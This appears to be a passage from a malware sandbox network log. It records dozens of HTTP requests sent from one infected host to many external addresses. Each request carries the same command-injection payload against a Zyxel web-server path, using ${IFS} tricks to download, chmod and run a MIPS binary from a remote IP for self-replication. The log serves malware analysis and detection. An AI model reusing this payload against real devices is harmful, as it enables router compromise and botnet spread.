                                      Jan 14, 2024 15:50:42.214288950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3403192.168.2.1439410156.31.117.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.219324112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3404192.168.2.1433474150.79.106.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.219378948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3405192.168.2.1440980101.147.224.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.219455004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3406192.168.2.145650477.43.131.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.219495058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3407192.168.2.1458558193.212.145.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.219541073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3408192.168.2.144877675.52.143.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.219598055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3409192.168.2.1454240132.175.79.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.219670057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3410192.168.2.145701866.164.235.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.219736099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3411192.168.2.1453196153.205.154.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.219800949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3412192.168.2.1450948135.234.245.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.216312885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3413192.168.2.144511623.79.118.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.216480017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3414192.168.2.1457722118.168.233.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.216536999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3415192.168.2.145469862.74.127.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.216588974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3416192.168.2.145869048.155.116.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.216618061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3417192.168.2.145101498.180.65.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.216650963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3418192.168.2.146054053.181.4.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.216711998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3419192.168.2.1436474124.14.72.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.216753006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3420192.168.2.1438484167.164.24.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.216799974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3421192.168.2.143294043.62.44.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.216841936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3422192.168.2.1448952207.139.231.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.216923952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3423192.168.2.144101432.104.186.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.216970921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3424192.168.2.1443190189.18.84.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.217006922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3425192.168.2.1441418198.55.247.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.217077971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3426192.168.2.145363818.128.207.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.217123032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3427192.168.2.14446402.240.56.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.217169046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3428192.168.2.1453658132.157.83.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.217222929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3429192.168.2.1433062157.83.42.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.217253923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3430192.168.2.1449808144.222.193.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.217355967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3431192.168.2.1445050141.143.72.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.217448950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3432192.168.2.1439598219.199.211.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.217473030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3433192.168.2.1453592159.23.138.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.217552900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3434192.168.2.1442472194.46.144.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.217612982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3435192.168.2.143514087.226.6.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.217681885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3436192.168.2.143950832.120.212.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.217755079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3437192.168.2.1437442202.38.183.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.217812061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3438192.168.2.14469288.244.122.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.217879057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3439192.168.2.1440658203.121.104.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.217952967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3440192.168.2.144676454.88.229.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.217983007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3441192.168.2.1442994188.186.156.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.218044043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3442192.168.2.1451634160.24.73.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.218103886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3443192.168.2.1448144119.60.50.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.218183041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3444192.168.2.1438836167.179.117.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.218239069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3445192.168.2.1458568101.200.129.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.218307018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3446192.168.2.1436168150.114.135.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.218348026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3447192.168.2.144638299.244.56.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.218415976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3448192.168.2.145328266.75.188.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.218472004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3449192.168.2.1435772135.134.33.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.218559027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3450192.168.2.1443126124.224.74.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.218621016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3451192.168.2.144611842.109.13.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.218661070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3452192.168.2.1457942115.93.212.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.218708992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3453192.168.2.145571827.95.22.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.218755960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3454192.168.2.145443223.7.200.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.218806982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3455192.168.2.1439026157.10.99.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.218868971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3456192.168.2.143615269.34.184.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.218899965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3457192.168.2.1444284148.21.152.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.218945980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3458192.168.2.1457484197.240.13.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.219002008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3459192.168.2.1435018158.41.18.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.219031096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3460192.168.2.145027494.90.205.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.219118118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3461192.168.2.143830662.132.181.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.219183922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3462192.168.2.1452648116.71.161.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.219232082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3463192.168.2.144666082.152.6.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.219296932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3464192.168.2.145549218.48.224.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.219312906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3465192.168.2.1444910116.184.165.206443
                                      TimestampBytes transferredDirectionData
